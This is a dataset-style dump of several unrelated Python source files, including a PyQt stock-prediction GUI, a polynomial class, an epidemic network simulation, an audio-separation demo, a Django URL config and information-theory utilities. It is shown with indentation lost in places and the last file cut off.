style += f'color: white'
style += '}'
font = Font(12)
time_button = QPushButton(x)
time_button.setFont(font)
time_button.setStyleSheet(style)
self.time_buttons_layout.addWidget(time_button)
time_button.clicked.connect(partial(self.view_timeframe, time=x))
menu_bar.home_b.setStyleSheet(f'color:{LIGHT_ORANGE}; background-color:{GREY}; border: 0px; padding: 10px')
self.main_layout.addWidget(menu_bar)
self.main_layout.addWidget(self.time_buttons_gbox)
self.predict_f = QHBoxLayout()
self.predict_gbox = QGroupBox()
self.predict_gbox.setStyleSheet('QGroupBox {background-color:'+DARK_GREY+'; border: 0px}')
self.predict_gbox.setLayout(self.predict_f)
self.predict_f.setContentsMargins(0.4*self.master.screen_width, 0, 0.4*self.master.screen_width, 0.05*self.master.screen_height)
self.predict_b = Button('PREDICT', hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.predict_b.clicked.connect(lambda: self.predict_clicked())
self.predict_f.addWidget(self.predict_b)
# Drawing the graph.
f = Figure(figsize=(5, 5), dpi=100)
f.patch.set_facecolor('#202020')
#f.patch.set_facecolor('#ffffff')
a = f.add_subplot(111)
canvas = FigureCanvas(f)
canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.main_layout.addWidget(canvas)
self.main_layout.addWidget(self.predict_gbox)
if self.session.current_stock:
if self.session.stock_change:
self.get_stock_data()
self.plot_graph(a)
canvas.draw()
self.setLayout(self.main_layout)
def get_stock_data(self):
self.session.stock_change = False
df = yf.download(self.session.stock_dict[self.session.current_stock])
self.session.current_df = df
def view_timeframe(self, time):
self.session.time_change = True
self.session.timeperiod = time
self.master.show_window(1, MainScreen)
def plot_graph(self, subplot):
df = self.session.current_df
current_date = datetime.datetime.now()
df = df['Close']
if self.session.timeperiod == 'All':
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '5Y':
year = current_date.year-5
df = df.loc[f'{year}-{current_date.month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '1Y':
year = current_date.year-1
df = df.loc[f'{year}-{current_date.month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '3M':
            # wrap the month into the 1..12 range (the modulo alone can yield month 0, which is not a valid date)
            month = (current_date.month - 1 - 3) % 12 + 1
            year = current_date.year
            if month > current_date.month:
                year = current_date.year - 1
            df = df.loc[f'{year}-{month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
elif self.session.timeperiod == '1M':
            # wrap the month into the 1..12 range (the modulo alone can yield month 0, which is not a valid date)
            month = (current_date.month - 1 - 1) % 12 + 1
            year = current_date.year
            if month > current_date.month:
                year = current_date.year - 1
            df = df.loc[f'{year}-{month}-{current_date.day}':]
if len(df):
df.plot(ax=subplot, lw=0.75, title=self.session.current_stock_ticker(), color='#FF8C00')
def predict_clicked(self):
self.pred_screen = MasterPredictionScreen(self)
class LoadingScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
self.thread = BackgroundTask(self)
self.thread.completed.connect(self.complete)
self.thread.start()
self.show()
def initui(self):
self.main_layout = QHBoxLayout(self)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.loading_screen = QWidget()
# Loading screen.
self.loading_gbox = QGroupBox()
self.loading_gbox.setStyleSheet(f'QGroupBox {{background-color: {DARK_GREY}; border: 0px}}')
self.loading_layout = QVBoxLayout()
self.loading_layout.setContentsMargins(0, 0, 0, 0)
self.loading_gbox.setLayout(self.loading_layout)
self.loading_label = QLabel("GENERATING PREDICTION ...")
self.loading_label.setStyleSheet('QLabel {color: white}')
self.loading_label.setFont(Font(20))
self.loading_layout.addWidget(self.loading_label)
self.loading_container = QHBoxLayout()
self.loading_container.setContentsMargins(0, 0, 0, 0)
self.loading_container.addWidget(self.loading_gbox)
self.loading_screen.setLayout(self.loading_container)
self.main_layout.addWidget(self.loading_screen)
self.setLayout(self.main_layout)
def complete(self, prediction):
self.master.show_window(1, PredictionScreen, prediction)
class PredictionScreen(QWidget):
def __init__(self, prediction, session):
super().__init__()
self.predictions = prediction
print(self.predictions)
self.session = session
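        # the stacked widget pre-loads a placeholder built with ['', '']; only build the UI for real predictions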
if len(self.predictions) != 2:
self.initui()
def initui(self):
self.container = QWidget()
self.container.setStyleSheet(f'QWidget{{background-color: {DARK_GREY}}}')
self.ticker_layout = QHBoxLayout()
self.ticker_l = Label(self.session.current_stock_ticker())
self.ticker_layout.addWidget(self.ticker_l)
self.ticker_layout.addStretch()
self.main_layout = QVBoxLayout()
self.labels_l = QHBoxLayout()
self.prediction_head_l = QLabel('PREDICTION')
self.prediction_head_l.setStyleSheet(f'QLabel{{color: {LIGHT_ORANGE}; background-color: {GREY}; padding: 16px}}')
self.prediction_head_l.setFont(Font(12))
self.prediction_head_l.setAlignment(Qt.AlignCenter)
self.accuracy_head_l = QLabel('ACCURACY')
self.accuracy_head_l.setStyleSheet(f'QLabel{{color: {LIGHT_ORANGE}; background-color: {GREY}; padding: 16px}}')
self.accuracy_head_l.setFont(Font(12))
self.accuracy_head_l.setAlignment(Qt.AlignCenter)
self.days_head_l = QLabel('DAYS')
self.days_head_l.setStyleSheet(f'QLabel{{color: {LIGHT_ORANGE}; background-color: {GREY}; padding: 16px}}')
self.days_head_l.setFont(Font(12))
self.days_head_l.setAlignment(Qt.AlignCenter)
self.labels_l.addWidget(self.prediction_head_l)
self.labels_l.addWidget(self.accuracy_head_l)
self.labels_l.addWidget(self.days_head_l)
self.labels_l.setSpacing(1)
self.labels_l.setContentsMargins(0, 0, 0, 0)
self.main_layout.addLayout(self.ticker_layout)
self.main_layout.addLayout(self.labels_l)
self.container.setLayout(self.main_layout)
self.con_lay = QHBoxLayout()
self.con_lay.addWidget(self.container)
self.con_lay.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.con_lay)
days_list = [1, 3, 7]
for i in range(3):
prediction = self.predictions[i]
prediction_layout = QHBoxLayout()
if prediction[0] == 1:
image = QPixmap('images/up_arrow.png')
else:
image = QPixmap('images/down_arrow.png')
self.prediction_l = QLabel()
self.prediction_l.setPixmap(image)
self.prediction_l.setAlignment(Qt.AlignCenter)
self.accuracy_l = QLabel(f'{str(prediction[1])}%')
self.accuracy_l.setStyleSheet(f'QLabel{{color: white}}')
self.accuracy_l.setFont(Font(20))
self.accuracy_l.setAlignment(Qt.AlignCenter)
self.days_l = QLabel(f'{str(days_list[i])}')
self.days_l.setStyleSheet(f'QLabel{{color: white}}')
self.days_l.setFont(Font(20))
self.days_l.setAlignment(Qt.AlignCenter)
prediction_layout.addWidget(self.prediction_l)
prediction_layout.addWidget(self.accuracy_l)
prediction_layout.addWidget(self.days_l)
self.main_layout.addLayout(prediction_layout)
# self.save_button = Button('SAVE')
# self.main_layout.addWidget(self.save_button)
self.setLayout(self.main_layout)
class MasterPredictionScreen(QDialog):
def __init__(self, master):
super().__init__(master)
self.setModal(True)
self.master = master
self.session = master.session
self.setWindowTitle('Fortune')
self.initui()
def initui(self):
self.stack = QStackedWidget(self)
self.stack.addWidget(LoadingScreen(self))
self.stack.addWidget(PredictionScreen(['', ''], self.session))
hbox = QHBoxLayout(self)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.stack)
self.setLayout(hbox)
self.stack.setCurrentIndex(0)
self.show()
def show_window(self, i, widget, a):
self.stack.removeWidget(self.stack.widget(i))
self.stack.insertWidget(i, widget(a, self.session))
self.stack.setCurrentIndex(i)
class ViewMyStocksScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.stock_groupbox = QWidget()
g_style = 'QWidget{'
g_style += f'border: 1px solid {DARK_GREY}; background-color: {DARK_GREY}'
g_style += '}'
self.stock_groupbox.setStyleSheet(g_style)
self.stock_layout = QFormLayout()
self.buttons = []
for stock_id in self.session.stock_dict:
frame = QHBoxLayout()
stock_ticker = self.session.stock_dict[stock_id]
view_b = Button(stock_ticker, hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
view_b.clicked.connect(partial(self.view_func, stock=stock_id))
delete_b = Button("DELETE", GREY, 'white', GREY, GREY, 'white', GREY)
delete_b.clicked.connect(partial(self.delete_func, stock=stock_id))
frame.addWidget(view_b)
frame.addStretch()
frame.addWidget(delete_b)
self.stock_layout.addRow(frame)
self.stock_groupbox.setLayout(self.stock_layout)
self.scroll = QScrollArea()
self.scroll.setWidget(self.stock_groupbox)
self.scroll.setWidgetResizable(True)
self.scroll.setStyleSheet('QScrollArea{border: 0px}')
self.main_layout = QVBoxLayout(self)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.setSpacing(0)
self.menubar = Menubar(self)
self.menubar.view_b.setStyleSheet(f'color:{LIGHT_ORANGE}; background-color:{GREY}; border: 0px; padding: 16px')
self.main_layout.addWidget(self.menubar)
self.main_layout.addWidget(self.scroll)
def view_func(self, stock):
self.session.current_stock = stock # Changes the current stock to the chosen stock.
self.session.stock_change = True # Downloads a new dataframe.
self.master.show_window(1, MainScreen) # Goes back to the home screen.
def delete_func(self, stock):
pass
class SearchScreen(QWidget):
def __init__(self, master=None):
super().__init__()
self.master = master
self.session = self.master.session
self.initui()
def initui(self):
self.widget_list = []
self.master_layout = QHBoxLayout()
self.setStyleSheet(f'background-color: {DARK_GREY}')
self.master_container = QWidget()
self.main_layout = QVBoxLayout()
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.setSpacing(0)
self.menubar = Menubar(self)
self.menubar.addstock_b.setStyleSheet(f'color:{LIGHT_ORANGE}; background-color:{GREY}; border: 0px; padding: 16px')
self.search_bar = QHBoxLayout()
self.search_bar.setContentsMargins(20, 20, 20, 20)
self.search_bar.setSpacing(10)
self.search_e = QLineEdit()
self.search_e.setPlaceholderText("Enter Stock Ticker")
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.search_b = Button(" GO ", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.search_b.clicked.connect(lambda: self.search_func())
self.search_bar.addWidget(self.search_e)
self.search_bar.addWidget(self.search_b)
self.main_layout.addWidget(self.menubar)
self.main_layout.addLayout(self.search_bar)
self.error_label = QLabel("Stock is invalid")
self.error_label.setStyleSheet('QLabel{background-color:'+WARM_RED+'; color: white; padding: 12px}')
font = Font(12)
self.error_label.setFont(font)
self.error_frame = QHBoxLayout()
self.error_frame.setContentsMargins(0, 0, 0.8*self.master.screen_width, 0)
self.error_frame.addWidget(self.error_label)
self.main_layout.insertLayout(1, self.error_frame)
self.error_label.setHidden(True)
self.f = Figure(figsize=(5, 5), dpi=100)
self.f.patch.set_facecolor('#202020')
self.a = self.f.add_subplot(111)
self.canvas = FigureCanvas(self.f)
self.canvas.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.main_layout.addWidget(self.canvas)
self.add_f = QHBoxLayout()
self.add_f.setContentsMargins(0.4*self.master.screen_width, 0, 0.4*self.master.screen_width, 0.1*self.master.screen_height)
self.add_b = Button("ADD STOCK", hover_colour=LIGHT_ORANGE, hover_border=LIGHT_ORANGE)
self.add_b.clicked.connect(lambda: self.add_clicked())
self.add_f.addWidget(self.add_b)
self.main_layout.addLayout(self.add_f)
self.master_container.setLayout(self.main_layout)
self.master_layout.addWidget(self.master_container)
self.master_layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.master_layout)
def search_func(self):
is_valid = False
stock_ticker = str(self.search_e.text()).upper()
try:
df = yf.download(stock_ticker)
except ValueError:
df = []
if len(df): # If the stock ticker is valid.
is_valid = True
self.error_label.setHidden(True)
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
df = df['Close']
df.plot(ax=self.a, lw=0.75, title=stock_ticker, color='#FF8C00')
self.canvas.draw()
if not is_valid:
self.error_label.setHidden(False)
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
def add_clicked(self):
stock = str(self.search_e.text()).upper()
is_valid = self.session.dbh.add_stock_to_db(stock, self.session.current_user.user_id)
if is_valid:
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white} QLineEdit:focus{border: 2px solid rgb(64, 64, 64)}')
self.session.update()
self.master.show_window(2, ViewMyStocksScreen)
else:
self.error_label.setHidden(False)
self.search_e.setStyleSheet('QLineEdit {font: 15pt "Calibri"; padding: 10px; background-color: white; border: 2px solid '+WARM_RED+'}')
def keyPressEvent(self, event):
if event.key() == 16777220: # Enter key - 16777220
self.search_func()
class Menubar(QGroupBox):
def __init__(self, parent_layout):
super().__init__()
font = Font(12)
self.style = 'QPushButton{'
self.style += f'color:{LIGHT_GREY}; background-color:{GREY}; border: 0px; padding: 16px'
self.style += '}'
self.style += 'QPushButton:Hover{'
self.style += f'color: white'
self.style += '}'
self.setStyleSheet('QGroupBox {background-color: '+GREY+'; border: 0px}')
self.parent_layout = parent_layout
self.layout = QHBoxLayout()
self.layout.setSpacing(0)
self.layout.setContentsMargins(0, 0, 0, 0)
self.home_b = QPushButton('HOME')
self.home_b.clicked.connect(lambda: self.parent_layout.master.show_window(1, MainScreen))
self.home_b.setFont(font)
self.home_b.setStyleSheet(self.style)
self.home_b.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)
self.layout.addWidget(self.home_b)
self.view_b = QPushButton('MY STOCKS')
self.view_b.clicked.connect(lambda: self.parent_layout.master.show_window(2, ViewMyStocksScreen))
self.view_b.setFont(font)
self.view_b.setStyleSheet(self.style)
self.view_b.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)
self.layout.addWidget(self.view_b)
self.addstock_b = QPushButton('SEARCH')
self.addstock_b.clicked.connect(lambda: self.parent_layout.master.show_window(3, SearchScreen))
self.addstock_b.setFont(font)
self.addstock_b.setStyleSheet(self.style)
self.addstock_b.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Minimum)
self.layout.addWidget(self.addstock_b)
self.logout_b = QPushButton('LOG OUT')
self.logout_b.clicked.connect(lambda: self.parent_layout.master.show_window(0, LoginScreen))
self.logout_b.setFont(font)
self.logout_b.setStyleSheet(self.style)
self.layout.addWidget(self.logout_b)
self.setLayout(self.layout)
class BackgroundTask(QThread):
completed = pyqtSignal(list)
def __init__(self, master):
super().__init__()
self.session = master.session
def run(self):
predictions = []
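        # one (direction, accuracy) prediction per horizon: 1, 3 and 7 days ahead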
stock = self.session.current_stock_ticker()
for period in (1, 3, 7):
dnn = Dnn(stock=stock, period=period)
prediction = dnn.predict()
predictions.append(prediction)
self.completed.emit(predictions)
class Button(QPushButton):
def __init__(self, text, border_colour=ORANGE, bg=ORANGE, fg='white', hover_colour=None, hover_font=None, hover_border=None):
super().__init__(text)
self.style = f'QPushButton {{' \
f'color:{fg}; border-width:2px; border-style:solid; border-color:{border_colour};' \
f'border-radius:24px; padding:16px; background-color:{bg}}}' \
f'QPushButton:Hover {{' \
f'background-color: {hover_colour}; color: {hover_font}; border-color: {hover_border}}}'
self.setStyleSheet(self.style)
font = Font(12)
self.setFont(font)
class Label(QLabel):
def __init__(self, text):
super().__init__(text)
self.style = f'QLabel {{' \
f'color:white; border-width:2px; border-style:solid; border-color:{ORANGE}; border-radius:24px;' \
f'padding:16px; background-color:{ORANGE}}}'
self.setStyleSheet(self.style)
font = Font(12)
self.setFont(font)
class Font(QFont):
def __init__(self, size):
super().__init__()
self.setLetterSpacing(QFont.AbsoluteSpacing, 2)
self.setWeight(QFont.ExtraBold)
self.setStretch(110)
self.setPixelSize(size)
if __name__ == '__main__':
app = QApplication(sys.argv)
sizeObject = QDesktopWidget().screenGeometry(-1)
WIDTH = sizeObject.width()
HEIGHT = sizeObject.height()
app.setWindowIcon(QIcon('logo.png'))
ex = MainUi()
sys.exit(app.exec())
|
999,323 | ff29851cf95a40950e7745ff6004f411420d21cb | x = float(input())
k = int(input())
cos = 0
somar = True
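# Maclaurin series: cos(x) = 1 - x^2/2! + x^4/4! - ..., truncated at the x^k term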
for i in range(0, k+1, 2):
fat = 1
for j in range(1, i+1):
fat = fat * j
if somar:
cos = cos + x ** i / fat
somar = False
else:
cos = cos - x ** i / fat
somar = True
print(f"{cos:.4f}") |
999,324 | 790808832cc46336c1569bbad7c37701909ffa98 | import os
import sys
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
if path not in sys.path:
sys.path.insert(1, path)
import nussl
def main():
# input audio file
input_name = os.path.join('..', 'Input','Sample1.wav')
signal = nussl.AudioSignal(path_to_input_file=input_name)
# make a directory to store output if needed
if not os.path.exists(os.path.join('..', 'Output')):
os.mkdir(os.path.join('..', 'Output'))
# Set up Repet
repet = nussl.Repet(signal)
# and Run
repet.run()
# Get foreground and background audio signals
bkgd, fgnd = repet.make_audio_signals()
# and write out to files
bkgd.write_audio_to_file(os.path.join('..', 'Output', 'Sample1_background.wav'))
fgnd.write_audio_to_file(os.path.join('..', 'Output', 'Sample1_foreground.wav'))
if __name__ == '__main__':
main()
|
999,325 | 117518aba332ca7bcb9c4c60f8f91b4034f86bf2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 23 10:35:46 2020
@author: luca
"""
import numpy as np
import matplotlib.pyplot as plt
import numpy.random as rnd
from network4strel import BetaDistribution, LognormalDistribution, DiscreteDistribution, GammaDistribution, CategoricalDistribution, DeterministicCategoricalDistribution, StateTransitionModel, Network, NetworkSimulator, SimulationOutput
import time
import pickle
#fitted parameters of a lognormal of node degree
#shape,loc,scale = 0.7985868513480973, -1.0172598183244927, 11.737271521475328
#lognorm = LognormalDistribution(shape,loc,scale)
#infection_duration_distribution = DeterministicDiscreteDistribution(2)
with open("degree_dist_no_events.pickle","rb") as f:
base_degree_distribution = pickle.load(f)
with open("degree_dist_events.pickle","rb") as f:
event_degree_distribution = pickle.load(f)
event_probability_distribution = CategoricalDistribution([0.0,1.0/30,1.0/15,1.0/7,3.0/7],[0.2,0.2,0.2,0.2,0.2])
#rough estimate:
#80% asymptomatic; infective 1-2 days before symptoms and 2-5 days after symptoms, with equal probability.
infectivity_duration = DiscreteDistribution([0,100,100,125,250,250,250,125],7,"infection_duration")
delay_to_infectivity = GammaDistribution(1.87,1/0.28,max_range=15) #from merler
#init_dist = CategoricalDistribution(["S","I","R"],[0.995,0.005,0.0])
init_dist = CategoricalDistribution(["1","2","3","4"],[0.99,0.0,0.01,0.0])
#Beta distribution with mean 0.05
infection_probability_distribution = BetaDistribution(2,38)
node_number = 500
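# The four states appear to encode an SEIR-like model:
# "1" susceptible, "2" exposed (not yet infective), "3" infective, "4" removed.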
state_model = StateTransitionModel(states = ["1","2","3","4"],
susceptible = {"1":True,"2":False, "3":False, "4":False},
infective = {"1":False, "2":False, "3":True, "4":False},
has_age = {"1":False, "2":True, "3":True, "4":False},
age_distribution = {"2":delay_to_infectivity,
"3":infectivity_duration},
next_state = {"1":DeterministicCategoricalDistribution("2"),
"2":DeterministicCategoricalDistribution("3"),
"3":DeterministicCategoricalDistribution("4")},
initial_state = init_dist)
#state_model = StateTransitionModel(states = ["S","I","R"],
# susceptible = {"S":True, "I":False, "R":False},
# infective = {"S":False, "I":True, "R":False},
# has_age = {"S":False, "I":True, "R":False},
# age_distribution = {"I":DeterministicDistribution(2)},
# next_state = {"S":DeterministicCategoricalDistribution("I"),
# "I":DeterministicCategoricalDistribution("R")},
# initial_state = init_dist)
print("\n\n******************************")
t = time.process_time()
network = Network(node_number,state_model,base_degree_distribution,event_degree_distribution,event_probability_distribution,infection_probability_distribution)
t = time.process_time() - t
print("Network of {0:d} nodes created in {1:.6f} seconds".format(node_number,t))
max_steps = 100
runs=5
outfile = "strelsim.png"
t = time.process_time()
sim = NetworkSimulator(network,save_full_network = True)
out = sim.simulate(runs=runs,max_steps=max_steps)
t = time.process_time() - t
print("Simulation of {0:d} runs of {1:d} steps in {2:.6f} seconds".format(runs,max_steps,t))
#out.plot_trajectory(0,file=outfile)
x = out.peak_distribution()
x = x[out.mask_only_explosive]
print("mean size of infection peak is {0:.5f}".format(np.mean(x)/node_number))
y = out.peak_time_distribution()
y = y[out.mask_only_explosive]
print("mean peak time of infection in days: {0:.5f}".format(np.mean(y)))
|
999,326 | 50e018bf5f285d25561798c7da733509aadb0ae9 | from django.conf.urls import patterns, url
from control import views
urlpatterns = patterns(
'control.views',
url(r'^$', 'home', name="home"),
url(r'^sprinklers/', 'sprinklers', name='sprinklers'),
url(r'^accounts/', 'accounts', name='accounts'),
url(r'^logs/', 'logs', name='logs'),
url(r'^command/', 'command', name='command'),
)
|
999,327 | 9b326497b83f3dbe6d10eaf0ed6c8c26468bd7cb | class Polynomial:
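    """Polynomial of degree `degree`; coefficients in `koef` are stored
    highest power first: koef[i] multiplies x**(degree - i) (see get())."""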
def __init__(self, n, k=None):
self.degree = n
if k is None:
self.koef = [1 for i in range(n + 1)]
else:
if len(k) > n:
k = k[:n + 1]
elif len(k) < n:
k.extend([0.0 for i in range(n - len(k))])
self.koef = [x for x in k]
if len(self.koef) < self.degree + 1:
self.koef.extend([0 for i in range(self.degree - len(self.koef) + 1)])
def __mul__(self, other):
ret = Polynomial(self.degree, self.koef)
if isinstance(other, int) or isinstance(other, float):
for i in range(len(ret.koef)):
ret.koef[i] *= other
elif isinstance(other, Polynomial):
diff = other.degree + ret.degree
ext = [0.0 for i in range(diff + 1)]
for i in range(other.degree + 1):
for j in range(ret.degree + 1):
buff = ret.koef[j] * other.koef[i]
if buff == 0:
continue
else:
ext[diff - (ret.degree - j + other.degree - i)] += buff
ret.degree = diff
ret.koef = ext
else:
raise Exception
return ret
def __add__(self, other):
ret = Polynomial(self.degree, self.koef)
if isinstance(other, int) or isinstance(other, float):
ret.koef[-1] += other
elif isinstance(other, Polynomial):
if other.degree > ret.degree:
diff = other.degree - ret.degree
ret.degree += diff
ext = [0.0 for i in range(diff)]
ext.extend(ret.koef)
ret.koef = ext
i = ret.degree
while i != -1:
ret.koef[i] += other.koef[i]
i -= 1
elif other.degree < ret.degree:
buf = other.koef
diff = ret.degree - other.degree
ext = [0.0 for i in range(diff)]
ext.extend(buf)
i = ret.degree
while i != -1:
ret.koef[i] += ext[i]
i -= 1
else:
i = ret.degree
while i != -1:
ret.koef[i] += other.koef[i]
i -= 1
else:
raise Exception
return ret
def __sub__(self, other):
ret = Polynomial(self.degree, self.koef)
if isinstance(other, int) or isinstance(other, float):
ret.koef[-1] -= other
elif isinstance(other, Polynomial):
if other.degree > ret.degree:
diff = other.degree - ret.degree
ret.degree += diff
ext = [0.0 for i in range(diff)]
ext.extend(ret.koef)
ret.koef = ext
elif other.degree < ret.degree:
buf = other.koef
diff = ret.degree - other.degree
ext = [0.0 for i in range(diff)]
ext.extend(buf)
else:
ext = other.koef
i = ret.degree
while i != -1:
ret.koef[i] -= ext[i]
i -= 1
else:
raise Exception
return ret
def up_degree(self) :
self.degree += 1
self.koef.append(0.0)
def get(self, x):
res = 0.0
for i in range(self.degree + 1):
res += (self.koef[i] * (x ** (self.degree - i)))
return res
def integral(self):
ret = Polynomial(self.degree, self.koef)
        # use enumerate instead of list.index(): index() returns the first match,
        # which gives the wrong power whenever a coefficient value repeats
        ret.koef = [k / (self.degree - i + 1) if k else k
                    for i, k in enumerate(ret.koef)]
ret.up_degree()
return ret
def integral_variable_up(self, down):
i = self.integral()
return i - i.get(down)
def __str__(self):
i = self.degree
prnt_str = ""
if not i:
prnt_str += "{0}".format(self.koef[0])
return prnt_str
for k in self.koef:
if k:
if not i:
prnt_str += " + {0}".format(k)
else:
if i != self.degree:
prnt_str += " + "
prnt_str += "{0}x^{1}".format(k, i)
i -= 1
return prnt_str |
999,328 | d0a138ed4de7cc216ae453949f961971b3b3f860 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@File : matht.py
@Author: sladesha
@Date : 2019/7/22 0:15
@Desc :
'''
import math
from .typet import is_type
import sys
from .listt import index_hash_map, Pi
from math import log
from math import e
__EPS = 1.4e-45
def entropy(props, type="list", explation=False):
'''
    :param props: input data
    :param type: "list" means raw experiment outcomes (values need not sum to 1);
                 "prob" means outcome frequencies that sum to 1
    :param explation: whether to print a hint for interpreting the result
:return:
'''
if explation:
print("the more the unstable")
if type not in ("list", "prob"):
raise ValueError("type should be list or prob,list be the expriment")
if type == "list":
if is_type(props, (list)):
prop = set(props)
resultEn = 0
for single in prop:
pi = Pi(single, props)
resultEn -= pi * math.log(pi)
return resultEn
elif is_type(props, (float, int)):
return -props * math.log(props)
else:
resultEn = 0
for pi in props:
resultEn -= pi * math.log(max(pi, __EPS))
return resultEn
raise TypeError
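# Example, using the frequency semantics shown in condition_entropy's doctests:
#   entropy([1, 1, 0, 0]) -> 0.6931... (= ln 2; two equally likely outcomes)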
def condition_entropy(datax, datay, explation=False):
'''
:param datax:
:param datay:
    :return: H(X|Y), the conditional entropy: the remaining uncertainty in X once Y is known
:test:
condition_entropy([1,0,1,0],[2,3,2,3])------>__EPS
condition_entropy([1,1,0,0],[2,3,2,3])------>0.6931471805599453
'''
if explation:
print("the less the better")
if len(datax) != len(datay):
raise ValueError("datax and datay should be the same length")
    resultConEn = 0  # final conditional entropy H(X|Y)
    YElements = list(set(datay))
    index_map = index_hash_map(datay)
    for uniqueYEle in YElements:
        YIndex = index_map.get(uniqueYEle)
        # indices in datay whose value equals this yi
        dataX_Y = []
        # collect the datax values at those indices
        for idx in YIndex:
            dataX_Y.append(datax[idx])
        HX_uniqueYEle = max(entropy(dataX_Y), __EPS)  # H(X|Y=yi)
        pi = max(__EPS, Pi(uniqueYEle, datay))  # pi = p(Y=yi)
        resultConEn += pi * HX_uniqueYEle  # accumulate H(X|Y) = Σ p(Y=yi)*H(X|Y=yi)
    return resultConEn  # the conditional entropy H(X|Y)
def MI(A, B, explation=False):
if explation:
print("the more the better")
return entropy(A) - condition_entropy(A, B)
def NMI(A, B, explation=False):
if explation:
print("the more the better")
total = len(A)
A_ids = set(A)
B_ids = set(B)
A_index_map = index_hash_map(A)
B_index_map = index_hash_map(B)
    # compute the mutual information
MI = 0
for idA in A_ids:
for idB in B_ids:
idAOccur = A_index_map.get(idA)
idBOccur = B_index_map.get(idB)
idABOccur = list(set(idAOccur) & set(idBOccur))
px = 1.0 * len(idAOccur) / total
py = 1.0 * len(idBOccur) / total
pxy = 1.0 * len(idABOccur) / total
MI = MI + pxy * math.log(pxy / (px * py) + __EPS)
    # normalize the mutual information
Hx = entropy(A)
Hy = entropy(B)
MIhat = 2.0 * MI / (Hx + Hy)
return MIhat
def ln(num):
return log(num, e)
def word_edit_distince(str1, str2):
    # build a (len(str1)+1) x (len(str2)+1) matrix; the +1 rows/columns handle empty prefixes of str1 or str2
matrix = [[i + j for i in range(len(str2) + 1)] for j in range(len(str1) + 1)]
for i in range(1, len(str1) + 1):
for j in range(1, len(str2) + 1):
            # indices here start at 1, so use -1 when indexing into the strings
if str1[i - 1] == str2[j - 1]:
cost = 0
else:
cost = 1
            # cost of deletion (above), insertion (left), substitution (upper-left)
matrix[i][j] = min(matrix[i - 1][j] + 1, matrix[i][j - 1] + 1, matrix[i - 1][j - 1] + cost)
return matrix[len(str1)][len(str2)]
class BM25(object):
"""docstring for BM25"""
def __init__(self, docs):
self.docs = docs
self.idf = {}
        # document frequency of each term
        self.df = {}
        # per-document term frequencies
self.f = []
        # number of documents and average document length
self.D = len(self.docs)
self.avgdl = sum(len(doc) for doc in self.docs) / self.D
        # tunable parameters
self.k1 = 1
self.b = 0.75
self.init()
def init(self):
for doc in self.docs:
tmp = {}
for word in doc:
tmp[word] = tmp.get(word, 0) + 1
self.f.append(tmp)
for key in tmp.keys():
self.df[key] = self.df.get(key, 0) + 1
for k, v in self.df.items():
self.idf[k] = math.log(self.D + 0.5) - math.log(v + 0.5)
def relation(self, doc, index):
score = 0
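        # BM25 term score: idf(w) * f*(k1+1) / (f + k1*(1 - b + b*doc_len/avgdl))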
for word in doc:
if word not in self.f[index]:
continue
doc_len = len(self.docs[index])
fi = self.f[index].get(word)
score += (self.idf.get(word) * fi * (self.k1 + 1)) / (
fi + self.k1 * (1 - self.b + self.b * (doc_len / self.avgdl)))
return score
def similarity(self, doc):
scores = []
for i in range(self.D):
score = self.relation(doc, i)
scores.append(score)
return scores
def relative_entropy(probx, proby):
'''
    :desc relative entropy, also known as KL divergence
    :param probx:
    :param proby:
    :return: H(p||q) = Σ px*log(px/py); 0 when px and py are identical, larger as they differ more; H(p||q) = H(p,q) - H(p)
'''
if len(probx) != len(proby):
raise ValueError("input data should be the same length")
resultConEn = 0
for i in range(len(probx)):
resultConEn += probx[i] * math.log(max(probx[i] / max(proby[i], __EPS), __EPS))
return resultConEn
def cross_entropy(probx, proby):
'''
    :desc cross entropy
    :param probx:
    :param proby:
    :return: -Σ pi * log2(qi)
'''
if len(probx) != len(proby):
raise ValueError("input data should be the same length")
resultConEn = 0
for i in range(len(probx)):
resultConEn -= probx[i] * math.log(max(proby[i], __EPS), 2)
return resultConEn
def JSD(prob1, prob2):
'''
    :desc Jensen-Shannon divergence: measures how similar the distributions prob1 and prob2 are
:param prob1:
:param prob2:
:return:
'''
if len(prob1) != len(prob2):
raise ValueError("input should be the same length")
prob1_norm = sum(abs(p) for p in prob1)
prob2_norm = sum(abs(p) for p in prob2)
prob1 = [p / prob1_norm for p in prob1]
